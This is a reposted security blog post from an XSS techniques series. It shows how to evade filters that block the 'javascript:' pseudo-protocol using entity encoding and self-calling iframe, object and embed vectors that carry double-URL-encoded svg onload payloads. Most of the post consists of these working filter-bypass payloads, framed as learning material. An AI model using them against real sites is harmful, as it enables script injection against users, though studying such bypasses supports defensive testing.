zoukankan      html  css  js  c++  java
  • 【XSS技巧拓展】————29、Alternative to Javascript Pseudo-Protocol

    Browsers accept “javascript:” in their address bar as a way to execute javascript code, which makes it a pseudo-protocol instead of a real one like “http:”, for example. It can be used in the same way as an URL when calling an external resource. Example:

    <a href=javascript:alert(1)>

    Contrary to Data URI scheme (“data:”), the javascript one executes in same context of the actual page, being very useful in open redirect vulnerabilities and in some XSS vectors. But it’s as useful as easy to be detected and blocked by a filter or WAF.

    In fact, we can use mixed case and encode it with HTML entities (see an easy-to-use list here) like:

    Javas&#99;ript:alert(1)

    (URL-encoded form)
    Javas%26%2399;ript:alert(1)

    But it’s still easy to flag.

    Here is another way to pass a filter that is blocking “javascript:”. Let’s consider we have the following XSS vector:

    <iframe src=javascript:alert(1)>

    In a generic URL like this:

    http(s)://host/page?p=XSS

    Where “host” is an IP address or domain, “page” is the vulnerable page and “p” is the vulnerable parameter.

    In order to bypass filtering of all forms of “javascript:” we call the same vulnerable URL again with another vector (<svg onload>), this time double URL encoded:

    http(s)://host/page?p=<iframe src=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>

    This also respects “X-Frame-Options: SAMEORIGIN” HTTP security header, because it calls itself. Notice that we double encoded key points of the second vector, to avoid regex for event handlers based in “on” plus something and equal sign.

    A live example is here (open it in Firefox).

    Other XSS vectors that work with “javascript:” also work with this self-calling method. Good examples are:

    <object data=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>

    <embed src=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>

    See this cheat sheet for more vectors.

    There’s also a variation using HTML entities, which although we are considering them being blocked by filter/WAF, can be used in a slightly different way:

    <iframe src=?p=%26lt;svg/o%256Eload%26equals;alert(1)%26gt;>

    Assuming that filtering only for the HTML entities suitable for “javascript:” are in place.

    #hack2learn

    总会有不期而遇的温暖. 和生生不息的希望。
  • 相关阅读:
    团队展示
    第二次结对编程作业
    第12组 团队展示
    第一次结对编程作业
    第一次个人编程作业
    软工第一次作业
    第十章 创建计算字段
    第九章 用正则表达式进行搜索
    第八章 用通配符进行过滤
    第七章 数据过滤
  • 原文地址:https://www.cnblogs.com/devi1/p/13486379.html
Copyright © 2011-2022 走看看